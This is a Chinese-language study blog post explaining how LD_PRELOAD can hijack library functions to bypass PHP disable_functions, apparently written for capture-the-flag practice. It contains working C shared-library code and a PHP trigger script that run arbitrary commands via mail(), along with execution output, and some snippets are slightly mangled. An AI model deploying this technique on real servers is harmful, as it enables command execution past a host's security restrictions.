借助這位師傅的文章來學習通過LD_PRELOAD來繞過disable_function的原理

【PHP繞過】LD_PRELOAD bypass disable_functions_phpid繞過-CSDN博客

感謝這位師傅的貢獻

介紹

靜態鏈接：

（1）舉個情景來幫助理解： 假設你要搬家，但家具不換，全部打包帶走。

（2）優點：搬到新家后，直接開箱即用，不依賴外部資源（不去鄰居家借洗衣機）

（3）缺點：搬家時行李又多又重（程序體積大），而且如果家具升級（比如庫更新），得重新買一套再搬一次（重新編譯程序）

（4）在編譯時，所有依賴的庫代碼可直接嵌入到可執行文件中，程序獨立運行，但體積較大，且庫更新需重新編譯程序

動態鏈接：

（1）舉個情景來幫助理解：這次搬家，只帶必需品，其他東西（比如工具書，電器）選擇去附近的圖書館或共享商店按需借用。需要時隨時去拿，用完歸還。

（2）優點：行李輕便（程序體積小），多個家庭共享同一本書或工具（多個程序共享一個庫），資源更新也方便（圖書館換新書）

（3）缺點：可能出現圖書館關門（庫文件缺失）
（4）編譯時不進行函數庫的鏈接，而是在程序運行時才動態地載入所需的函數庫。這樣使得可執行文件體積較小，并且多個程序可以共享相同的動態庫，節省內存資源。動態鏈接提高了程序的靈活性和可維護性。

再來了解一下什么是LD_PRELOAD

LD_PRELOAD 是linux/Unix系統中一個強大的環境變量，允許用戶在程序運行時優先加載自定義的共享庫，從而覆蓋或替換標準庫中的函數。

?也就是說，通過LD_PRELOAD指定的共享庫會在程序啟動時最先加載，其定義的函數會覆蓋后續加載的同名函數。

用法

那么其利用方法很明顯了，如果我們能在我們的自定義庫中寫入一些與”原本函數“ 作用不同 但同名 的函數，就能成功覆蓋掉原本函數的用法了。

跟著師傅的例子再來了解一下

劫持getgid

看看id命令在執行過程中會用到的函數表

┌──(root?kali)-[~/Desktop]
└─# readelf -Ws /usr/bin/id     Symbol table '.dynsym' contains 74 entries:Num:    Value          Size Type    Bind   Vis      Ndx Name0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 1: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND endgrent@GLIBC_2.2.5 (2)2: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND getenv@GLIBC_2.2.5 (2)

?而這些函數都是可以被我們覆蓋的，現在觀察一下getgid函數的內容，輸入 man getgid

?構造一個與之原型相同的函數

#include<stdlib.h>
#include<unistd.h>
#include<sys.types.h>gid_t getgid(void){unsetenv("LD_PRELOAD");// 使用unsetenv刪除原有的共享庫system("'echo 'I hacked U!!\n' > successful");
}

運行指令

gcc --shared -fPIC rob.c -o rob.so

?

?接下來，載入這個庫并運行id命令

┌──(root?kali)-[~/test]
└─# LD_PRELOAD=./rob.so id
uid=0(root) gid=0(root) groups=0(root)

?得到successful文件

這就是一次劫持操作

繞過disable_function

當題目中有disable_function的限制時，會導致我們拿到的shell都是空的，這時就要想辦法繞過disable_function。其實我們要實現的操作主要是執行命令，可以使用LD_PRELOAD環境變量強制該程序優先加載一個惡意共享庫(.so文件)，覆蓋其調用的標準庫函數(如getuid())，從而執行任意代碼

編寫惡意文件

#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>__attribute__((constructor)) void hack(void){
// 使用__attribute__((constructor)) 可以在加載庫的同時執行函數unsetenv("LD_PRELOAD");system("ls > hackfile");// 用于php
}

?運行指令

┌──(root?kali)-[~/test]
└─# gcc --shared -fPIC hack.c -o hack.so

編寫hack.php文件

<?php
putenv("LD_PRELOAD=./hack.so");
mail("","","","");
echo file_get_contents("hackfile");
?>

此時再執行，就可以成功劫持了

┌──(root?kali)-[~/test]
└─# php hack.php
sh: 1: /usr/sbin/sendmail: not found
1
hack.c
hack.php
hack.so
hackfile
rob.c
rob.so
successful

?同時，這位師傅還給出了手動輸入參數的做法，真的很厲害

將hack.c改為：

#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>__attribute__((constructor)) void hack(void){
// 使用__attribute__((constructor)) 可以在加載庫的同時執行函數unsetenv("LD_PRELOAD");char *cmd=getenv("MY_CMD");system(cmd);
}

再將hack.php改為：

<?php
$a=$argv[1];
$cmd="$a > hackfile";
@putenv("MY_CMD=".$cmd);
putenv("LD_PRELOAD=./hack.so");
mail("","","","");
echo file_get_contents("hackfile");
?>

?就可以這樣運行代碼了：

┌──(root?kali)-[~/test]
└─# php hack.php id
sh: 1: /usr/sbin/sendmail: not found
uid=0(root) gid=0(root) groups=0(root)

前幾天看了一篇推文，發覺對漏洞和工具的原理還是要去理解。感謝師傅提供的思路和方法！